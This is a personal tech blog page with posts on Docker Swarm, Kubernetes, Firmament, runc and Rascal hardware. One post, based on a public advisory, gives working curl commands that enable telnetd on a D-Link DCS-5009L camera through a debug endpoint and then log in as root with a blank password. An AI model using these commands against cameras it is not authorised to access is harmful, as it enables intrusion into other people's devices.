DockerCon 2016 Keynote

Andrea and I presented Docker 1.12 orchestration on stage at DockerCon this year — in front of 4,000 people! I don’t even think I’ve ever met 4,000 people. It was awesome!

Comments (4)

Getting a root telnet prompt on D-Link DCS-5009L IP Camera

My dad thoughtfully sent me a DCS-5009L nanny cam to play around with yesterday. Naturally, the first thing I wanted to do was get to a root shell on the device. I quickly came across this security advisory from Tao Sauvage at IOActive. Thanks, Tao!

tl;dr plug in the camera, figure out its IP and start telnetd like this:

$ curl --data 'ReplySuccessPage=advanced.htm&ReplyErrorPage=errradv.htm&WebDebugLevel=0&WebFuncLevel=1180250000' -X POST http://admin@[CAMERA_IP]/setDebugLevel
$ curl --data 'ReplySuccessPage=home.htm&ReplyErrorPage=errradv.htm&SystemCommand=telnetd&ConfigSystemCommand=test' -X POST http://admin@[CAMERA_IP]/setSystemCommand
$ telnet [CAMERA_IP]
Trying 10.0.1.173...
Connected to 10.0.1.173.
Escape character is '^]'.
 
(none) login: admin
Password: [leave blank]
 
 
BusyBox v1.12.1 (2014-09-03 17:28:29 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
 
#

Default username is admin with password empty.

Per Tao’s security advisor: in the first curl, 1180250000 is a magic constant that puts the device in a debugging mode where the /setSystemCommand HTTP endpoint is available. In the second curl, we use this endpoint to run telnetd.

Leave a Comment

Docker Swarm 1.0 with Multi-host Networking: Manual Setup

Jeff Nickoloff had a great Medium post recently about how to set up a Swarm 1.0 cluster using the multi-host networking features added in Docker 1.9. He uses Docker Machine’s built-in Swarm support to create a demonstration cluster in just a few minutes.

In this post, I’ll show how to recreate the same cluster manually — that is, without docker-machine provisioning. This is for advanced users who want to understand what Machine is doing under the hood.

First, let’s take a look at the layout of the cluster Jeff created in his post. There are four machines:

Swarm cluster topology

Topology of our Swarm cluster.

To approximate the provisioning that Machine is doing under the hood, we’ll use this Vagrantfile to provision four Ubuntu boxes:

Name   IP   Description
kv2   192.168.33.10   Consul (for both cluster discovery and networking)
c0-master   192.168.33.11   Swarm master
c0-n1   192.168.33.12   Swarm node 1
c0-n2   192.168.33.13   Swarm node 2

In the directory where you saved the Vagrantfile, run vagrant up. This will take 5-10 minutes, but at the end of the process you should have four running VMs with Docker 1.9 or higher running. Note how our Vagrant file starts each instance of Docker Engine (the docker daemon) with --cluster-store=consul://192.168.33.10:8500 and --cluster-advertise=eth1:2375. Those flags are the same ones Jeff passes to docker-machine using --engine-opt.

Because Docker networking requires a >= 3.16 kernel, we need to do one manual step on each machine to upgrade its kernel. Run these commands from your host shell prompt:

$ vagrant ssh -c "sudo apt-get install -y linux-image-generic-lts-utopic && sudo reboot" kv2
$ vagrant ssh -c "sudo apt-get install -y linux-image-generic-lts-utopic && sudo reboot" c0-master
$ vagrant ssh -c "sudo apt-get install -y linux-image-generic-lts-utopic && sudo reboot" c0-n1
$ vagrant ssh -c "sudo apt-get install -y linux-image-generic-lts-utopic && sudo reboot" c0-n2

(Jeff doesn’t have to do this in his tutorial because Machine provisions using an iso that contains a recent kernel.)

We’re now ready to set up a Consul key/value store just as Jeff did:

$ docker -H=tcp://192.168.33.10:2375 run -d -p 8500:8500 -h consul progrium/consul -server -bootstrap

Here’s how you manually start the swarm manager on the c0-master machine:

$ docker -H=tcp://192.168.33.11:2375 run -d -p 3375:2375 swarm manage consul://192.168.33.10:8500/

Next we start two swarm agent containers on nodes c0-n1 and c0-n2:

$ docker -H=tcp://192.168.33.12:2375 run -d swarm join --advertise=192.168.33.12:2375 consul://192.168.33.10:8500/
$ docker -H=tcp://192.168.33.13:2375 run -d swarm join --advertise=192.168.33.13:2375 consul://192.168.33.10:8500/

Let’s test the cluster:

$ docker -H=tcp://192.168.33.11:3375 info
$ docker -H=tcp://192.168.33.11:3375 run swarm list consul://192.168.33.10:8500/
$ docker -H=tcp://192.168.33.11:3375 run hello-world

Create the overlay network just as Jeff did:

$ docker -H=tcp://192.168.33.11:3375 network create -d overlay myStack1
$ docker -H=tcp://192.168.33.11:3375 network ls

Create the same two (nginx and alpine) containers that Jeff did:

$ docker -H=tcp://192.168.33.11:3375 run -d --name web --net myStack1 nginx
$ docker -H=tcp://192.168.33.11:3375 run -itd --name shell1 --net myStack1 alpine /bin/sh

And verify they can talk to each other just as Jeff did:

$ docker -H=tcp://192.168.33.11:3375 attach shell1
$ ping web
$ apk update && apk add curl
$ curl http://web/

You should find that shell1 is able to ping the nginx container, and vice-versa, just as was the case in Jeff’s tutorial.

Comments (18)

What is the Firmament scheduler?

Some in the Kubernetes community are considering adopting a new scheduler based on Malte Schwarzkopf’s Firmament cluster scheduler. I just finished reading Ch. 5 of Malte’s thesis. Here’s a high level summary of what Firmament is about.

Today’s container orchestration systems like Kubernetes, Mesos, Diego and Docker Swarm rely heavily on straightforward heuristics for scheduling. This works well if you want to optimize along a single dimension, like efficient bin packing of workloads to servers. But these heuristics are not designed to simultaneously handle complex tradeoffs between competing priorities like data locality, scheduling delay, soft and hard affinity constraints, inter-task dependency constraints, etc. Taking so many factors into account at once is difficult.

The Firmament scheduler tries to optimize across many tradeoffs, while still making fast scheduling decisions. How? Like Microsoft’s Quincy scheduler, it considers things from a new angle: cost. Suppose we assign a cost to every scheduling tradeoff. The problem of efficient scheduling then becomes a global cost minimization problem, which is much more tractable than trying to design a heuristic that balances many different factors.

Firmament’s technical implementation is to model the scheduling problem as a flow graph. Workloads are the flow sources, and they flow into the cluster, whose topology of machines and availability zones is modeled by vertices in the graph. Ultimately, all workloads arrive at a global sink, having either flowed through a machine on which they were scheduled or having remained unscheduled. Which path is decided by cost.

Here’s a simplified diagram I created (based on Firmament’s diagram (which is a simpler version of Quincy’s Fig. 4)):

Simplified example of Firmament's flow graph structure.

Simplified example of Firmament’s flow graph structure. By assigning costs to each edge, global cost minimization can be performed. For example, each of the three workloads may be scheduled on the cluster or remain unscheduled, depending on the relative costs of their immediate execution vs. delay.

But how are these costs determined? That’s the coolest part of Firmament: it supports pluggable cost models through a cost model API. Firmament provides several performance-based cost models as well as an interesting one that seeks to minimize data center electricity consumption. Of course, users can supply their own cost models through the API.

For more information on Firmament, here are some resources:

Comments (1)

Docker runc

I had some time recently to start playing around with Docker’s new runc / OpenContainers work.  This is basically the old libcontainer, but now it’s an industry consortium governed by the Linux Foundation.  So, Docker and CoreOS are now friends, or at least frenemies, which is very exciting.

The README over on runc doesn’t fully explain how to get runc to work, i.e., to run a simple example container.  They provide a nice example container.json file, but it comes with without a rootfs, which is confusing if you’re just getting started.  I posted a github issue comment about how to make their container.json work.

Here are the full steps to get the runc sample working:

1.  Build the runc binary if you haven’t already:

cd $GOPATH/src/github.com/opencontainers
git clone https://github.com/opencontainers/runc
cd runc
make

2.  Grab their container.json from this section of the runc readme:  opencontainers/runc#ocf-container-json-format

3.  Build a rootfs. The easiest way to do this is to docker export the filesystem of an existing container:


docker run -it ubuntu bash

Now exit immediately (Ctrl+D).


docker ps -a # to find the container ID of the ubuntu container you just exited
docker export [container ID] > docker-ubuntu.tar

Then untar docker-ubuntu.tar into a directory called rootfs, which should be in the same parent directory as your container.json. You now have a rootfs that will work with the container.json linked above. Type sudo runc and you’ll be at an sh prompt, inside your container.

Leave a Comment

Kubernetes Concepts

Once you have a Kubernetes cluster up and running, there are three key abstractions to understand: pods, services and replication controllers.

Pods. Pods — as in a pod of whales (whale metaphors are very popular in this space) — is a group of containers scheduled on the same host. They are tightly coupled because they are all part of the same application and would have run on the same host in the old days. Each container in a pod shares the same network, IPC and PID namespaces. Of course, since Docker doesn’t support shared PID namespaces (every Docker process is PID 1 of its own hierarchy and there’s no way to merge two running containers), a pod right now is really just a group of Docker containers running on the same host with shared Kubernetes volumes (as distinct from Docker volumes).

Pods are a low level primitive. Users do not normally create them directly; instead, replication controller are responsible for creating pods (see below).

You can view pods like this:

kubectl.sh get pods

Read more about pods in the Kubernetes documentation: Kubernetes Pods

Replication Controllers. Pods, like the containers within them, are ephemeral. They do not survive node failure or reboots. Instead, replication controllers are used to keep a certain number of pod replicas running at all times, taking care to start new pod replicas when more or needed. Thus, replication controllers are longer lived than pods and can be thought of like a manager abstraction sitting atop of the pod concept.

You can view replication controllers like this:

kubectl.sh get replicationControllers

Read more about replication controllers in the Kubernetes documentation: Replication Controllers in Kubernetes.

Services. Services are an abstraction that groups together multiple pods to provide a service. (The term “service” here is used in the microservices architecture sense.) The example in the Kubernetes documentation is that of an image-processing backend, which may consist of several pod replicas. These replicas, grouped together, represent the image processing microservice within your larger application.

A service is longer lived than a replication controller, and a service may create or destroy many replication controllers during its life. Just as replication controllers are a management abstraction sitting atop the pods abstraction, services can be thought of as a control abstraction that sits atop multiple replication controllers.

You can view services like this:

kubectl.sh get services

Read more about services in the Kubernetes documentation: Kubernetes Services.

Source / Further Reading: Design of Kubernetes

Leave a Comment

Techniques for Exploring Docker Containers

The preferred method of poking around inside a running Docker container is nsenter. Docker has a nice tutorial.

But what if your container doesn’t have any executable shell like /bin/sh? You can’t enter it with nsenter or docker exec. But here are a few tricks you can use to learn about it.

docker inspect -f {{.Config.Env}} – will show you the environment variables in the container

docker export | tar -tvf - – to list the filesystem inside the container (thanks to cnf on #docker-dev for teaching me this one)

docker export | tar -xvf - . – can do this from a temp directory to extract the entire container filesystem and examine it in more detail

I’ll add more tricks here in the future.

Leave a Comment

Tutorial: Setting up a Docker Swarm on Your Laptop Using VirtualBox

This tutorial shows you one method you can use to test out Docker Swarm on a single physical machine, like your laptop. We’ll create 3 VMs: two Swarm worker nodes and one Swarm manager.

Setting Up VMs with NAT Network

First, create three VirtualBox VMs, each with 1gb RAM and 1 CPU. Set up each one with Bridged Networking, meaning that your Linksys/Airport/whatever router will assign them each an IP on the same subnet.

In this example, I’ll use three Ubuntu machines with the hostnames below, plus static DHCP in the router to force them to always have the same IPs:

DockerManager = 10.0.0.100 (runs swarm manager, doesn’t run any containers)
DockerNode1 = 10.0.1.101 (first worker node, runs containers)
DockerNode2 = 10.0.1.102 (second worker node, runs containers)

Alternate method: if you don’t want your VMs to be exposed directly on your LAN, you can use “internal networking” in VirtualBox. This will put all three VMs on the same virtual LAN within your laptop. Turn it on by doing this on the host:

$ VBoxManage natnetwork add -t nat-int-network -n “192.168.15.0/24” -e
$ VBoxManage natnetwork start -t nat-int-network

Then change networking in each VM to use “NAT Network” and select new option “nat-int-network”

Now reboot the VMs. Each should have a unique IP of the form: 192.168.15.xxx

ping one machine from the other. Or test like this:
nc -l 192.168.15.4 12345 (one machine A)
echo “bananas” | nc 192.168.15.4 12345 (on machine B)

Basic Installs On Each Machine

You’ll need to install Docker on each machine. I won’t cover that here. Afterward, do this:

docker pull swarm

to retrieve the Swarm container, which is the same container for both the Swarm nodes and the master.

The container, by the way, just contains a single Go binary called swarm. If you re-build the binary, you can just run it directly without docker building it into a new container. I won’t cover that more advanced scenario here, though.

Running Swarm

On any machine, do this one-time operation:

docker run --rm swarm create
# gives back some token like 372cd183a188848c3d5ef0e6f4d7a963

On DockerNode1, start the Docker daemon bound to 0.0.0.0:2375:

sudo stop docker
sudo docker -d -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
(leave daemon running and open a new terminal tab)
docker -H tcp://10.0.1.101:2375 run -d --name node1 swarm join --addr=10.0.1.101:2375 token://372cd183a188848c3d5ef0e6f4d7a963
docker -H tcp://10.0.1.101:2375 ps
# now you see agent running on DockerNode1

Note: if you do `export DOCKER_HOST=tcp://10.0.1.101:2375` you can omit the “-H tcp://…” part.

On DockerNode2, follow the same procedure as on DockerNode1 above, except the join command will look like this:

docker -H tcp://10.0.1.102:2375 run -d --name node1 swarm join --addr=10.0.1.102:2375 token://372cd183a188848c3d5ef0e6f4d7a963

Now you can list the nodes from any machine. For instance, from DockerManager you could do:

docker run --rm swarm list token://372cd183a188848c3d5ef0e6f4d7a963

If you have built your own swarm binary, you can also use it to list the nodes without a container:

./swarm list token://372cd183a188848c3d5ef0e6f4d7a963

Now start the swarm manager. On DockerManager:

docker run -d -p 3375:2375 swarm manage token://372cd183a188848c3d5ef0e6f4d7a963

Υοu can now do commands like this on ANY machine:

docker -H tcp://10.0.1.100:3375 info
docker -H tcp://10.0.1.100:3375 run -it --rm ubuntu bash
docker -H tcp://10.0.1.100:3375 run -it --rm ubuntu bash
docker -H tcp://10.0.1.100:3375 run -it --rm ubuntu bash
docker -H tcp://10.0.1.100:3375 run -it --rm ubuntu bash
[...repeat as many times as you like...]

Now go back to DockerNode1 and try:

docker -H tcp://10.0.1.101:2375 ps

And this on Docker2:

docker -H tcp://10.0.1.102:2375 ps

You can see different bash processes being allocated to the two machines.

Leave a Comment

Compiling a custom uwsgi for the Rascal

This post is just a note to myself about how to modify the uwsgi source code, recompile uwsgi and install it on a Rascal. Here are the steps:

1. Create a uwsgi source code tarball on goelzer.com

I have the uwsgi source code in a directory (/home/mikegoelzer/goelzer.com/uwsgi). After modifying the C code, I can use these commands to build a new tarball that bitbake will fetch in the next step:


cd /home/mikegoelzer/goelzer.com/uwsgi
tar cvzf uwsgi-1.2.3.tar.gz uwsgi-1.2.3/
md5sum uwsgi-1.2.3.tar.gz && shasum -a 256 uwsgi-1.2.3.tar.gz

The tarball is now accessible at http://goelzer.com/uwsgi/uwsgi-1.2.3.tar.gz. The above command also prints two hashes of the tar file that will be used below.

2. Update the OE uwsgi recipe

On the OE build system, I modify the bitbake recipe for uwsgi in recipes/uwsgi/uwsgi_1.2.3.bb:


DESCRIPTION = "uWSGI is a WSGI web server for Python web applications"
HOMEPAGE = "http://projects.unbit.it/uwsgi/wiki"
SECTION = "net"
PRIORITY = "optional"
LICENSE = "GPLv2"
SRCNAME = "uwsgi"
PR = "r0"

SRC_URI = "http://goelzer.com/uwsgi/uwsgi-1.2.3.tar.gz \
file://editor.ini \
file://public.ini \
file://arm-timer-syscall.patch"

[...]

Here’s the full recipe as a backup. And a shell script used to rebuild uwsgi.

Also, the last two lines of the file should be updated with the hash values computed in step 1.

3. Rebuild uwsgi using bitbake:


source env.sh
rm oe_sources/uwsgi-1.2.3.tar.gz*
bitbake -c clean uwsgi
bitbake -b uwsgi_1.2.3.bb

4. SCP and install the newly built opkg

From the Rascal:


rm uwsgi_1.2.3-r0.6_armv5te.ipk
opkg remove uwsgi
scp ubuntu@ec2-204-236-242-68.compute-1.amazonaws.com:/home/ubuntu/openembedded-rascal/tmp/deploy/glibc/ipk/armv5te/uwsgi_1.2.3-r0.6_armv5te.ipk .
opkg install uwsgi_1.2.3-r0.6_armv5te.ipk
/etc/init.d/rascal-webserver.sh reload

To see the uwsgi logs:


cat /var/log/uwsgi/public.log

Leave a Comment

Rascal/Arduino Dual Relay Shield v2

Yesterday, I assembled a few copies of my Dual Relay Shield (rev 2). Here’s a picture of its handsome exterior:

Dual Relay Shield v2

Dual Relay Shield v2 (green thing on top) connected to a Rascal 0.6 (red and yellow thing on bottom). The DRS lets you switch 2 relays on and off to control devices up to 5 amps at 220 volts.

The shield has two relays that can switch up to 5 amps — this could be a pair of lights, motors, speakers, etc. It also has an integrated I2C temperature sensor. You could use this to build, for instance, a web-based thermostat. I expect Brandon will set up a Rascal demo or tutorial using the shield in the near future, to which I’ll link from here once it exists.

All of the design files are open source. You can find them on my Rascal Shield github.

Leave a Comment

Older Posts »